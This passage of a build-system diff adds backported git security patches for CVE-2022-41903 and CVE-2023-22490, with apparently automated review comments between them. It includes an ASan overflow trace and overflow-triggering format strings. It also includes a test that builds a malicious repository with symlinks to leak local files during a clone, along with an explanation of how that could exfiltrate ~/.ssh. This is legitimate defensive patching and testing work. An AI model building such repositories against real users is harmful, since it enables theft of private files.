++test_expect_success 'log --pretty with padding and preceding control chars' '
++ printf "\20\20 0" >expect &&
++ git log -1 --pretty="format:%x10%x10%>|(4)%x30" >actual &&
++ test_cmp expect actual
++'
++
+ test_expect_success EXPENSIVE,SIZE_T_IS_64BIT 'log --pretty with huge commit message' '
+ # We only assert that this command does not crash. This needs to be
+ # executed with the address sanitizer to demonstrate failure.
+diff --git a/utf8.c b/utf8.c
+index a66984b..6632bd2 100644
+--- a/utf8.c
++++ b/utf8.c
+@@ -212,11 +212,15 @@ int utf8_strnwidth(const char *string, size_t len, int skip_ansi)
+ const char *orig = string;
+
+ while (string && string < orig + len) {
+- int skip;
++ int glyph_width, skip;
++
+ while (skip_ansi &&
+ (skip = display_mode_esc_sequence_len(string)) != 0)
+ string += skip;
+- width += utf8_width(&string, NULL);
++
++ glyph_width = utf8_width(&string, NULL);
++ if (glyph_width > 0)
++ width += glyph_width;
+ }
+ return string ? width : len;
+ }
+--
+2.25.1
+
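Review bot: The new `if (glyph_width > 0)` guard in `utf8_strnwidth()` carries no comment saying why negative widths are dropped, and the function's header comment (outside this hunk) only describes the invalid-UTF-8 fallback. A one-line comment above the guard would record the rule, for example `/* utf8_width() returns -1 for control characters; count them as zero columns */`. That matters to the next reader because the byte length and the returned width now diverge for such input.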
diff --git a/meta/recipes-devtools/git/files/CVE-2022-41903-09.patch b/meta/recipes-devtools/git/files/CVE-2022-41903-09.patch
new file mode 100644
index 0000000000..761d4c6a9f
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2022-41903-09.patch
@@ -0,0 +1,162 @@
+From 937b71cc8b5b998963a7f9a33312ba3549d55510 Mon Sep 17 00:00:00 2001
+From: Patrick Steinhardt <ps@pks.im>
+Date: Thu, 1 Dec 2022 15:47:04 +0100
+Subject: [PATCH 09/12] utf8: fix overflow when returning string width
+
+The return type of both `utf8_strwidth()` and `utf8_strnwidth()` is
+`int`, but we operate on string lengths which are typically of type
+`size_t`. This means that when the string is longer than `INT_MAX`, we
+will overflow and thus return a negative result.
+
+This can lead to an out-of-bounds write with `--pretty=format:%<1)%B`
+and a commit message that is 2^31+1 bytes long:
+
+ =================================================================
+ ==26009==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x603000001168 at pc 0x7f95c4e5f427 bp 0x7ffd8541c900 sp 0x7ffd8541c0a8
+ WRITE of size 2147483649 at 0x603000001168 thread T0
+ #0 0x7f95c4e5f426 in __interceptor_memcpy /usr/src/debug/gcc/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:827
+ #1 0x5612bbb1068c in format_and_pad_commit pretty.c:1763
+ #2 0x5612bbb1087a in format_commit_item pretty.c:1801
+ #3 0x5612bbc33bab in strbuf_expand strbuf.c:429
+ #4 0x5612bbb110e7 in repo_format_commit_message pretty.c:1869
+ #5 0x5612bbb12d96 in pretty_print_commit pretty.c:2161
+ #6 0x5612bba0a4d5 in show_log log-tree.c:781
+ #7 0x5612bba0d6c7 in log_tree_commit log-tree.c:1117
+ #8 0x5612bb691ed5 in cmd_log_walk_no_free builtin/log.c:508
+ #9 0x5612bb69235b in cmd_log_walk builtin/log.c:549
+ #10 0x5612bb6951a2 in cmd_log builtin/log.c:883
+ #11 0x5612bb56c993 in run_builtin git.c:466
+ #12 0x5612bb56d397 in handle_builtin git.c:721
+ #13 0x5612bb56db07 in run_argv git.c:788
+ #14 0x5612bb56e8a7 in cmd_main git.c:923
+ #15 0x5612bb803682 in main common-main.c:57
+ #16 0x7f95c4c3c28f (/usr/lib/libc.so.6+0x2328f)
+ #17 0x7f95c4c3c349 in __libc_start_main (/usr/lib/libc.so.6+0x23349)
+ #18 0x5612bb5680e4 in _start ../sysdeps/x86_64/start.S:115
+
+ 0x603000001168 is located 0 bytes to the right of 24-byte region [0x603000001150,0x603000001168)
+ allocated by thread T0 here:
+ #0 0x7f95c4ebe7ea in __interceptor_realloc /usr/src/debug/gcc/libsanitizer/asan/asan_malloc_linux.cpp:85
+ #1 0x5612bbcdd556 in xrealloc wrapper.c:136
+ #2 0x5612bbc310a3 in strbuf_grow strbuf.c:99
+ #3 0x5612bbc32acd in strbuf_add strbuf.c:298
+ #4 0x5612bbc33aec in strbuf_expand strbuf.c:418
+ #5 0x5612bbb110e7 in repo_format_commit_message pretty.c:1869
+ #6 0x5612bbb12d96 in pretty_print_commit pretty.c:2161
+ #7 0x5612bba0a4d5 in show_log log-tree.c:781
+ #8 0x5612bba0d6c7 in log_tree_commit log-tree.c:1117
+ #9 0x5612bb691ed5 in cmd_log_walk_no_free builtin/log.c:508
+ #10 0x5612bb69235b in cmd_log_walk builtin/log.c:549
+ #11 0x5612bb6951a2 in cmd_log builtin/log.c:883
+ #12 0x5612bb56c993 in run_builtin git.c:466
+ #13 0x5612bb56d397 in handle_builtin git.c:721
+ #14 0x5612bb56db07 in run_argv git.c:788
+ #15 0x5612bb56e8a7 in cmd_main git.c:923
+ #16 0x5612bb803682 in main common-main.c:57
+ #17 0x7f95c4c3c28f (/usr/lib/libc.so.6+0x2328f)
+
+ SUMMARY: AddressSanitizer: heap-buffer-overflow /usr/src/debug/gcc/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:827 in __interceptor_memcpy
+ Shadow bytes around the buggy address:
+ 0x0c067fff81d0: fd fd fd fa fa fa fd fd fd fa fa fa fd fd fd fa
+ 0x0c067fff81e0: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd
+ 0x0c067fff81f0: fd fa fa fa fd fd fd fa fa fa fd fd fd fa fa fa
+ 0x0c067fff8200: fd fd fd fa fa fa fd fd fd fd fa fa 00 00 00 fa
+ 0x0c067fff8210: fa fa fd fd fd fa fa fa fd fd fd fa fa fa fd fd
+ =>0x0c067fff8220: fd fa fa fa fd fd fd fa fa fa 00 00 00[fa]fa fa
+ 0x0c067fff8230: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ 0x0c067fff8240: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ 0x0c067fff8250: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ 0x0c067fff8260: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ 0x0c067fff8270: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ Shadow byte legend (one shadow byte represents 8 application bytes):
+ Addressable: 00
+ Partially addressable: 01 02 03 04 05 06 07
+ Heap left redzone: fa
+ Freed heap region: fd
+ Stack left redzone: f1
+ Stack mid redzone: f2
+ Stack right redzone: f3
+ Stack after return: f5
+ Stack use after scope: f8
+ Global redzone: f9
+ Global init order: f6
+ Poisoned by user: f7
+ Container overflow: fc
+ Array cookie: ac
+ Intra object redzone: bb
+ ASan internal: fe
+ Left alloca redzone: ca
+ Right alloca redzone: cb
+ ==26009==ABORTING
+
+Now the proper fix for this would be to convert both functions to return
+an `size_t` instead of an `int`. But given that this commit may be part
+of a security release, let's instead do the minimal viable fix and die
+in case we see an overflow.
+
+Add a test that would have previously caused us to crash.
+
+Signed-off-by: Patrick Steinhardt <ps@pks.im>
+Signed-off-by: Junio C Hamano <gitster@pobox.com>
+
+Upstream-Status: Backport [https://github.com/git/git/commit/937b71cc8b5b998963a7f9a33312ba3549d55510]
+CVE: CVE-2022-41903
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ t/t4205-log-pretty-formats.sh | 8 ++++++++
+ utf8.c | 12 +++++++++---
+ 2 files changed, 17 insertions(+), 3 deletions(-)
+
+diff --git a/t/t4205-log-pretty-formats.sh b/t/t4205-log-pretty-formats.sh
+index 261a6f0..de15007 100755
+--- a/t/t4205-log-pretty-formats.sh
++++ b/t/t4205-log-pretty-formats.sh
+@@ -843,4 +843,12 @@ test_expect_success EXPENSIVE,SIZE_T_IS_64BIT 'log --pretty with huge commit mes
+ test_cmp expect actual
+ '
+
++test_expect_success EXPENSIVE,SIZE_T_IS_64BIT 'log --pretty with huge commit message does not cause allocation failure' '
++ test_must_fail git log -1 --format="%<(1)%B" $huge_commit 2>error &&
++ cat >expect <<-EOF &&
++ fatal: number too large to represent as int on this platform: 2147483649
++ EOF
++ test_cmp expect error
++'
++
+ test_done
+diff --git a/utf8.c b/utf8.c
+index 6632bd2..03be475 100644
+--- a/utf8.c
++++ b/utf8.c
+@@ -208,11 +208,12 @@ int utf8_width(const char **start, size_t *remainder_p)
+ */
+ int utf8_strnwidth(const char *string, size_t len, int skip_ansi)
+ {
+- int width = 0;
+ const char *orig = string;
++ size_t width = 0;
+
+ while (string && string < orig + len) {
+- int glyph_width, skip;
++ int glyph_width;
++ size_t skip;
+
+ while (skip_ansi &&
+ (skip = display_mode_esc_sequence_len(string)) != 0)
+@@ -222,7 +223,12 @@ int utf8_strnwidth(const char *string, size_t len, int skip_ansi)
+ if (glyph_width > 0)
+ width += glyph_width;
+ }
+- return string ? width : len;
++
++ /*
++ * TODO: fix the interface of this function and `utf8_strwidth()` to
++ * return `size_t` instead of `int`.
++ */
++ return cast_size_t_to_int(string ? width : len);
+ }
+
+ int utf8_strwidth(const char *string)
+--
+2.25.1
+
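Review bot: The added regression test is gated on `EXPENSIVE,SIZE_T_IS_64BIT`, so a default test run skips it and the new `cast_size_t_to_int()` return path in `utf8_strnwidth()` goes unexercised unless expensive tests are enabled. It also reads `$huge_commit`, which appears to be set by the preceding 'huge commit message' test (its body is outside this hunk), so the two cannot be run independently. The title 'does not cause allocation failure' is at odds with the body, which asserts `test_must_fail` and the `number too large to represent as int` message. A title such as `'log --pretty with huge commit message dies on width overflow'` would describe what is actually checked.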
diff --git a/meta/recipes-devtools/git/files/CVE-2022-41903-10.patch b/meta/recipes-devtools/git/files/CVE-2022-41903-10.patch
new file mode 100644
index 0000000000..bbfc6e758f
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2022-41903-10.patch
@@ -0,0 +1,99 @@
+From 81c2d4c3a5ba0e6ab8c348708441fed170e63a82 Mon Sep 17 00:00:00 2001
+From: Patrick Steinhardt <ps@pks.im>
+Date: Thu, 1 Dec 2022 15:47:10 +0100
+Subject: [PATCH 10/12] utf8: fix checking for glyph width in strbuf_utf8_replace()
+
+In `strbuf_utf8_replace()`, we call `utf8_width()` to compute the width
+of the current glyph. If the glyph is a control character though it can
+be that `utf8_width()` returns `-1`, but because we assign this value to
+a `size_t` the conversion will cause us to underflow. This bug can
+easily be triggered with the following command:
+
+ $ git log --pretty='format:xxx%<|(1,trunc)%x10'
+
+>From all I can see though this seems to be a benign underflow that has
+no security-related consequences.
+
+Fix the bug by using an `int` instead. When we see a control character,
+we now copy it into the target buffer but don't advance the current
+width of the string.
+
+Signed-off-by: Patrick Steinhardt <ps@pks.im>
+Signed-off-by: Junio C Hamano <gitster@pobox.com>
+
+Upstream-Status: Backport [https://github.com/git/git/commit/81c2d4c3a5ba0e6ab8c348708441fed170e63a82]
+CVE: CVE-2022-41903
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ t/t4205-log-pretty-formats.sh | 7 +++++++
+ utf8.c | 19 ++++++++++++++-----
+ 2 files changed, 21 insertions(+), 5 deletions(-)
+
+diff --git a/t/t4205-log-pretty-formats.sh b/t/t4205-log-pretty-formats.sh
+index de15007..52c8bc8 100755
+--- a/t/t4205-log-pretty-formats.sh
++++ b/t/t4205-log-pretty-formats.sh
+@@ -826,6 +826,13 @@ test_expect_success 'log --pretty with padding and preceding control chars' '
+ test_cmp expect actual
+ '
+
++test_expect_success 'log --pretty truncation with control chars' '
++ test_commit "$(printf "\20\20\20\20xxxx")" file contents commit-with-control-chars &&
++ printf "\20\20\20\20x.." >expect &&
++ git log -1 --pretty="format:%<(3,trunc)%s" commit-with-control-chars >actual &&
++ test_cmp expect actual
++'
++
+ test_expect_success EXPENSIVE,SIZE_T_IS_64BIT 'log --pretty with huge commit message' '
+ # We only assert that this command does not crash. This needs to be
+ # executed with the address sanitizer to demonstrate failure.
+diff --git a/utf8.c b/utf8.c
+index 03be475..ec03e69 100644
+--- a/utf8.c
++++ b/utf8.c
+@@ -377,6 +377,7 @@ void strbuf_utf8_replace(struct strbuf *sb_src, int pos, int width,
+ dst = sb_dst.buf;
+
+ while (src < end) {
++ int glyph_width;
+ char *old;
+ size_t n;
+
+@@ -390,21 +391,29 @@ void strbuf_utf8_replace(struct strbuf *sb_src, int pos, int width,
+ break;
+
+ old = src;
+- n = utf8_width((const char**)&src, NULL);
+- if (!src) /* broken utf-8, do nothing */
++ glyph_width = utf8_width((const char**)&src, NULL);
++ if (!src) /* broken utf-8, do nothing */
+ goto out;
+- if (n && w >= pos && w < pos + width) {
++
++ /*
++ * In case we see a control character we copy it into the
++ * buffer, but don't add it to the width.
++ */
++ if (glyph_width < 0)
++ glyph_width = 0;
++
++ if (glyph_width && w >= pos && w < pos + width) {
+ if (subst) {
+ memcpy(dst, subst, subst_len);
+ dst += subst_len;
+ subst = NULL;
+ }
+- w += n;
++ w += glyph_width;
+ continue;
+ }
+ memcpy(dst, old, src - old);
+ dst += src - old;
+- w += n;
++ w += glyph_width;
+ }
+ strbuf_setlen(&sb_dst, dst - sb_dst.buf);
+ strbuf_swap(sb_src, &sb_dst);
+--
+2.25.1
+
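Review bot: The new test only places control characters before the truncated range, so it does not cover the other case that the `glyph_width < 0` clamp changes in `strbuf_utf8_replace()`. With `glyph_width` forced to 0, the `if (glyph_width && ...)` branch is never taken for a control character, so one that falls inside `[pos, pos + width)` is copied through rather than replaced. A second `test_commit` whose subject puts the control bytes after the visible characters would pin that behaviour. The added comment could also say so explicitly, e.g. by ending it with `even when it lies inside the replaced range`. The loop begins and ends outside the hunks shown.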
diff --git a/meta/recipes-devtools/git/files/CVE-2022-41903-11.patch b/meta/recipes-devtools/git/files/CVE-2022-41903-11.patch
new file mode 100644
index 0000000000..f339edfc8a
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2022-41903-11.patch
@@ -0,0 +1,90 @@
+From f930a2394303b902e2973f4308f96529f736b8bc Mon Sep 17 00:00:00 2001
+From: Patrick Steinhardt <ps@pks.im>
+Date: Thu, 1 Dec 2022 15:47:15 +0100
+Subject: [PATCH 11/12] utf8: refactor strbuf_utf8_replace to not rely on preallocated buffer
+
+In `strbuf_utf8_replace`, we preallocate the destination buffer and then
+use `memcpy` to copy bytes into it at computed offsets. This feels
+rather fragile and is hard to understand at times. Refactor the code to
+instead use `strbuf_add` and `strbuf_addstr` so that we can be sure that
+there is no possibility to perform an out-of-bounds write.
+
+Signed-off-by: Patrick Steinhardt <ps@pks.im>
+Signed-off-by: Junio C Hamano <gitster@pobox.com>
+
+Upstream-Status: Backport [https://github.com/git/git/commit/f930a2394303b902e2973f4308f96529f736b8bc]
+CVE: CVE-2022-41903
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ utf8.c | 34 +++++++++++++---------------------
+ 1 file changed, 13 insertions(+), 21 deletions(-)
+
+diff --git a/utf8.c b/utf8.c
+index ec03e69..a13f5e3 100644
+--- a/utf8.c
++++ b/utf8.c
+@@ -365,26 +365,20 @@ void strbuf_add_wrapped_bytes(struct strbuf *buf, const char *data, int len,
+ void strbuf_utf8_replace(struct strbuf *sb_src, int pos, int width,
+ const char *subst)
+ {
+- struct strbuf sb_dst = STRBUF_INIT;
+- char *src = sb_src->buf;
+- char *end = src + sb_src->len;
+- char *dst;
+- int w = 0, subst_len = 0;
++ const char *src = sb_src->buf, *end = sb_src->buf + sb_src->len;
++ struct strbuf dst;
++ int w = 0;
+
+- if (subst)
+- subst_len = strlen(subst);
+- strbuf_grow(&sb_dst, sb_src->len + subst_len);
+- dst = sb_dst.buf;
++ strbuf_init(&dst, sb_src->len);
+
+ while (src < end) {
++ const char *old;
+ int glyph_width;
+- char *old;
+ size_t n;
+
+ while ((n = display_mode_esc_sequence_len(src))) {
+- memcpy(dst, src, n);
++ strbuf_add(&dst, src, n);
+ src += n;
+- dst += n;
+ }
+
+ if (src >= end)
+@@ -404,21 +398,19 @@ void strbuf_utf8_replace(struct strbuf *sb_src, int pos, int width,
+
+ if (glyph_width && w >= pos && w < pos + width) {
+ if (subst) {
+- memcpy(dst, subst, subst_len);
+- dst += subst_len;
++ strbuf_addstr(&dst, subst);
+ subst = NULL;
+ }
+- w += glyph_width;
+- continue;
++ } else {
++ strbuf_add(&dst, old, src - old);
+ }
+- memcpy(dst, old, src - old);
+- dst += src - old;
++
+ w += glyph_width;
+ }
+- strbuf_setlen(&sb_dst, dst - sb_dst.buf);
+- strbuf_swap(sb_src, &sb_dst);
++
++ strbuf_swap(sb_src, &dst);
+ out:
+- strbuf_release(&sb_dst);
++ strbuf_release(&dst);
+ }
+
+ /*
+--
+2.25.1
+
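Review bot: With `src` now declared `const char *`, the cast in `utf8_width((const char**)&src, NULL)` is redundant. That call sits in the unchanged lines between the two utf8.c hunks, so the patch leaves it as is. Writing `utf8_width(&src, NULL)` would let the compiler check the pointer type instead of silencing it. This is a style point only; behaviour is unchanged.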
diff --git a/meta/recipes-devtools/git/files/CVE-2022-41903-12.patch b/meta/recipes-devtools/git/files/CVE-2022-41903-12.patch
new file mode 100644
index 0000000000..978865978d
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2022-41903-12.patch
@@ -0,0 +1,124 @@
+From 304a50adff6480ede46b68f7545baab542cbfb46 Mon Sep 17 00:00:00 2001
+From: Patrick Steinhardt <ps@pks.im>
+Date: Thu, 1 Dec 2022 15:47:23 +0100
+Subject: [PATCH 12/12] pretty: restrict input lengths for padding and wrapping formats
+
+Both the padding and wrapping formatting directives allow the caller to
+specify an integer that ultimately leads to us adding this many chars to
+the result buffer. As a consequence, it is trivial to e.g. allocate 2GB
+of RAM via a single formatting directive and cause resource exhaustion
+on the machine executing this logic. Furthermore, it is debatable
+whether there are any sane usecases that require the user to pad data to
+2GB boundaries or to indent wrapped data by 2GB.
+
+Restrict the input sizes to 16 kilobytes at a maximum to limit the
+amount of bytes that can be requested by the user. This is not meant
+as a fix because there are ways to trivially amplify the amount of
+data we generate via formatting directives; the real protection is
+achieved by the changes in previous steps to catch and avoid integer
+wraparound that causes us to under-allocate and access beyond the
+end of allocated memory reagions. But having such a limit
+significantly helps fuzzing the pretty format, because the fuzzer is
+otherwise quite fast to run out-of-memory as it discovers these
+formatters.
+
+Signed-off-by: Patrick Steinhardt <ps@pks.im>
+Signed-off-by: Junio C Hamano <gitster@pobox.com>
+
+Upstream-Status: Backport [https://github.com/git/git/commit/304a50adff6480ede46b68f7545baab542cbfb46]
+CVE: CVE-2022-41903
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ pretty.c | 26 ++++++++++++++++++++++++++
+ t/t4205-log-pretty-formats.sh | 24 +++++++++++++++---------
+ 2 files changed, 41 insertions(+), 9 deletions(-)
+
+diff --git a/pretty.c b/pretty.c
+index c3c1443..e9687f0 100644
+--- a/pretty.c
++++ b/pretty.c
+@@ -13,6 +13,13 @@
+ #include "gpg-interface.h"
+ #include "trailer.h"
+
++/*
++ * The limit for formatting directives, which enable the caller to append
++ * arbitrarily many bytes to the formatted buffer. This includes padding
++ * and wrapping formatters.
++ */
++#define FORMATTING_LIMIT (16 * 1024)
++
+ static char *user_format;
+ static struct cmt_fmt_map {
+ const char *name;
+@@ -1029,6 +1036,15 @@ static size_t parse_padding_placeholder(const char *placeholder,
+ if (!*end || end == start)
+ return 0;
+ width = strtol(start, &next, 10);
++
++ /*
++ * We need to limit the amount of padding, or otherwise this
++ * would allow the user to pad the buffer by arbitrarily many
++ * bytes and thus cause resource exhaustion.
++ */
++ if (width < -FORMATTING_LIMIT || width > FORMATTING_LIMIT)
++ return 0;
++
+ if (next == start || width == 0)
+ return 0;
+ if (width < 0) {
+@@ -1188,6 +1204,16 @@ static size_t format_commit_one(struct strbuf *sb, /* in UTF-8 */
+ if (*next != ')')
+ return 0;
+ }
++
++ /*
++ * We need to limit the format here as it allows the
++ * user to prepend arbitrarily many bytes to the buffer
++ * when rewrapping.
++ */
++ if (width > FORMATTING_LIMIT ||
++ indent1 > FORMATTING_LIMIT ||
++ indent2 > FORMATTING_LIMIT)
++ return 0;
+ rewrap_message_tail(sb, c, width, indent1, indent2);
+ return end - placeholder + 1;
+ } else
+diff --git a/t/t4205-log-pretty-formats.sh b/t/t4205-log-pretty-formats.sh
+index 52c8bc8..572d02f 100755
+--- a/t/t4205-log-pretty-formats.sh
++++ b/t/t4205-log-pretty-formats.sh
+@@ -809,15 +809,21 @@ test_expect_success 'log --pretty with magical wrapping directives' '
+ '
+
+ test_expect_success SIZE_T_IS_64BIT 'log --pretty with overflowing wrapping directive' '
+- cat >expect <<-EOF &&
+- fatal: number too large to represent as int on this platform: 2147483649
+- EOF
+- test_must_fail git log -1 --pretty="format:%w(2147483649,1,1)%d" 2>error &&
+- test_cmp expect error &&
+- test_must_fail git log -1 --pretty="format:%w(1,2147483649,1)%d" 2>error &&
+- test_cmp expect error &&
+- test_must_fail git log -1 --pretty="format:%w(1,1,2147483649)%d" 2>error &&
+- test_cmp expect error
++ printf "%%w(2147483649,1,1)0" >expect &&
++ git log -1 --pretty="format:%w(2147483649,1,1)%x30" >actual &&
++ test_cmp expect actual &&
++ printf "%%w(1,2147483649,1)0" >expect &&
++ git log -1 --pretty="format:%w(1,2147483649,1)%x30" >actual &&
++ test_cmp expect actual &&
++ printf "%%w(1,1,2147483649)0" >expect &&
++ git log -1 --pretty="format:%w(1,1,2147483649)%x30" >actual &&
++ test_cmp expect actual
++'
++
++test_expect_success SIZE_T_IS_64BIT 'log --pretty with overflowing padding directive' '
++ printf "%%<(2147483649)0" >expect &&
++ git log -1 --pretty="format:%<(2147483649)%x30" >actual &&
++ test_cmp expect actual
+ '
+
+ test_expect_success 'log --pretty with padding and preceding control chars' '
+--
+2.25.1
+
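Review bot: The rewritten tests probe the new `FORMATTING_LIMIT` checks only with 2147483649, a value far above the limit, so nothing pins the boundary at 16 * 1024 itself. A pair of cases around it would catch an off-by-one in `width > FORMATTING_LIMIT` or `width < -FORMATTING_LIMIT`, for example `git log -1 --pretty="format:%<(16385)%x30" >actual` compared against `printf "%%<(16385)0" >expect`, alongside one at 16384 that is still expanded. In `parse_padding_placeholder()` the range check also runs on `width` only after the `strtol()` result has been assigned to it. If `width` is an `int` (its declaration is outside the hunk), a value that wraps into range would be accepted as a small width rather than rejected, so checking the `long` result before narrowing would be stricter.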
diff --git a/meta/recipes-devtools/git/files/CVE-2023-22490-1.patch b/meta/recipes-devtools/git/files/CVE-2023-22490-1.patch
new file mode 100644
index 0000000000..cc9b448c5c
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2023-22490-1.patch
@@ -0,0 +1,179 @@
+From 58325b93c5b6212697b088371809e9948fee8052 Mon Sep 17 00:00:00 2001
+From: Taylor Blau <me@ttaylorr.com>
+Date: Tue, 24 Jan 2023 19:43:45 -0500
+Subject: [PATCH 1/3] t5619: demonstrate clone_local() with ambiguous transport
+
+When cloning a repository, Git must determine (a) what transport
+mechanism to use, and (b) whether or not the clone is local.
+
+Since f38aa83 (use local cloning if insteadOf makes a local URL,
+2014-07-17), the latter check happens after the remote has been
+initialized, and references the remote's URL instead of the local path.
+This is done to make it possible for a `url.<base>.insteadOf` rule to
+convert a remote URL into a local one, in which case the `clone_local()`
+mechanism should be used.
+
+However, with a specially crafted repository, Git can be tricked into
+using a non-local transport while still setting `is_local` to "1" and
+using the `clone_local()` optimization. The below test case
+demonstrates such an instance, and shows that it can be used to include
+arbitrary (known) paths in the working copy of a cloned repository on a
+victim's machine[^1], even if local file clones are forbidden by
+`protocol.file.allow`.
+
+This happens in a few parts:
+
+ 1. We first call `get_repo_path()` to see if the remote is a local
+ path. If it is, we replace the repo name with its absolute path.
+
+ 2. We then call `transport_get()` on the repo name and decide how to
+ access it. If it was turned into an absolute path in the previous
+ step, then we should always treat it like a file.
+
+ 3. We use `get_repo_path()` again, and set `is_local` as appropriate.
+ But it's already too late to rewrite the repo name as an absolute
+ path, since we've already fed it to the transport code.
+
+The attack works by including a submodule whose URL corresponds to a
+path on disk. In the below example, the repository "sub" is reachable
+via the dumb HTTP protocol at (something like):
+
+ http://127.0.0.1:NNNN/dumb/sub.git
+
+However, the path "http:/127.0.0.1:NNNN/dumb" (that is, a top-level
+directory called "http:", then nested directories "127.0.0.1:NNNN", and
+"dumb") exists within the repository, too.
+
+To determine this, it first picks the appropriate transport, which is
+dumb HTTP. It then uses the remote's URL in order to determine whether
+the repository exists locally on disk. However, the malicious repository
+also contains an embedded stub repository which is the target of a
+symbolic link at the local path corresponding to the "sub" repository on
+disk (i.e., there is a symbolic link at "http:/127.0.0.1/dumb/sub.git",
+pointing to the stub repository via ".git/modules/sub/../../../repo").
+
+This stub repository fools Git into thinking that a local repository
+exists at that URL and thus can be cloned locally. The affected call is
+in `get_repo_path()`, which in turn calls `get_repo_path_1()`, which
+locates a valid repository at that target.
+
+This then causes Git to set the `is_local` variable to "1", and in turn
+instructs Git to clone the repository using its local clone optimization
+via the `clone_local()` function.
+
+The exploit comes into play because the stub repository's top-level
+"$GIT_DIR/objects" directory is a symbolic link which can point to an
+arbitrary path on the victim's machine. `clone_local()` resolves the
+top-level "objects" directory through a `stat(2)` call, meaning that we
+read through the symbolic link and copy or hardlink the directory
+contents at the destination of the link.
+
+In other words, we can get steps (1) and (3) to disagree by leveraging
+the dangling symlink to pick a non-local transport in the first step,
+and then set is_local to "1" in the third step when cloning with
+`--separate-git-dir`, which makes the symlink non-dangling.
+
+This can result in data-exfiltration on the victim's machine when
+sensitive data is at a known path (e.g., "/home/$USER/.ssh").
+
+The appropriate fix is two-fold:
+
+ - Resolve the transport later on (to avoid using the local
+ clone optimization with a non-local transport).
+
+ - Avoid reading through the top-level "objects" directory when
+ (correctly) using the clone_local() optimization.
+
+This patch merely demonstrates the issue. The following two patches will
+implement each part of the above fix, respectively.
+
+[^1]: Provided that any target directory does not contain symbolic
+ links, in which case the changes from 6f054f9 (builtin/clone.c:
+ disallow `--local` clones with symlinks, 2022-07-28) will abort the
+ clone.
+
+Reported-by: yvvdwf <yvvdwf@gmail.com>
+Signed-off-by: Taylor Blau <me@ttaylorr.com>
+Signed-off-by: Junio C Hamano <gitster@pobox.com>
+
+Upstream-Status: Backport
+[https://github.com/git/git/commit/58325b93c5b6212697b088371809e9948fee8052]
+CVE: CVE-2023-22490
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ t/t5619-clone-local-ambiguous-transport.sh | 63 ++++++++++++++++++++++
+ 1 file changed, 63 insertions(+)
+ create mode 100644 t/t5619-clone-local-ambiguous-transport.sh
+
+diff --git a/t/t5619-clone-local-ambiguous-transport.sh b/t/t5619-clone-local-ambiguous-transport.sh
+new file mode 100644
+index 0000000..7ebd31a
+--- /dev/null
++++ b/t/t5619-clone-local-ambiguous-transport.sh
+@@ -0,0 +1,63 @@
++#!/bin/sh
++
++test_description='test local clone with ambiguous transport'
++
++. ./test-lib.sh
++. "$TEST_DIRECTORY/lib-httpd.sh"
++
++if ! test_have_prereq SYMLINKS
++then
++ skip_all='skipping test, symlink support unavailable'
++ test_done
++fi
++
++start_httpd
++
++REPO="$HTTPD_DOCUMENT_ROOT_PATH/sub.git"
++URI="$HTTPD_URL/dumb/sub.git"
++
++test_expect_success 'setup' '
++ mkdir -p sensitive &&
++ echo "secret" >sensitive/secret &&
++
++ git init --bare "$REPO" &&
++ test_commit_bulk -C "$REPO" --ref=main 1 &&
++
++ git -C "$REPO" update-ref HEAD main &&
++ git -C "$REPO" update-server-info &&
++
++ git init malicious &&
++ (
++ cd malicious &&
++
++ git submodule add "$URI" &&
++
++ mkdir -p repo/refs &&
++ touch repo/refs/.gitkeep &&
++ printf "ref: refs/heads/a" >repo/HEAD &&
++ ln -s "$(cd .. && pwd)/sensitive" repo/objects &&
++
++ mkdir -p "$HTTPD_URL/dumb" &&
++ ln -s "../../../.git/modules/sub/../../../repo/" "$URI" &&
++
++ git add . &&
++ git commit -m "initial commit"
++ ) &&
++
++ # Delete all of the references in our malicious submodule to
++ # avoid the client attempting to checkout any objects (which
++ # will be missing, and thus will cause the clone to fail before
++ # we can trigger the exploit).
++ git -C "$REPO" for-each-ref --format="delete %(refname)" >in &&
++ git -C "$REPO" update-ref --stdin <in &&
++ git -C "$REPO" update-server-info
++'
++
++test_expect_failure 'ambiguous transport does not lead to arbitrary file-inclusion' '
++ git clone malicious clone &&
++ git -C clone submodule update --init &&
++
++ test_path_is_missing clone/.git/modules/sub/objects/secret
++'
++
++test_done
+--
+2.25.1
+
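Review bot: Because the whole body of 'ambiguous transport does not lead to arbitrary file-inclusion' runs under `test_expect_failure`, a failure of `git clone malicious clone` for any unrelated reason is reported as the same known breakage as the leak the test is meant to demonstrate. Moving `git clone malicious clone &&` into the 'setup' test would leave only `git -C clone submodule update --init` and the `test_path_is_missing` check under the expected failure, so the result is attributable to the submodule step. The commit message says the following patches implement the fix, so this presumably applies only until the test is switched to `test_expect_success`.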
diff --git a/meta/recipes-devtools/git/files/CVE-2023-22490-2.patch b/meta/recipes-devtools/git/files/CVE-2023-22490-2.patch
new file mode 100644
index 0000000000..0b5b40f827
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2023-22490-2.patch
@@ -0,0 +1,122 @@
+From cf8f6ce02a13f4d1979a53241afbee15a293fce9 Mon Sep 17 00:00:00 2001
+From: Taylor Blau <me@ttaylorr.com>
+Date: Tue, 24 Jan 2023 19:43:48 -0500
+Subject: [PATCH 2/3] clone: delay picking a transport until after get_repo_path()
+
+In the previous commit, t5619 demonstrates an issue where two calls to
+`get_repo_path()` could trick Git into using its local clone mechanism
+in conjunction with a non-local transport.
+
+That sequence is:
+
+ - the starting state is that the local path https:/example.com/foo is a
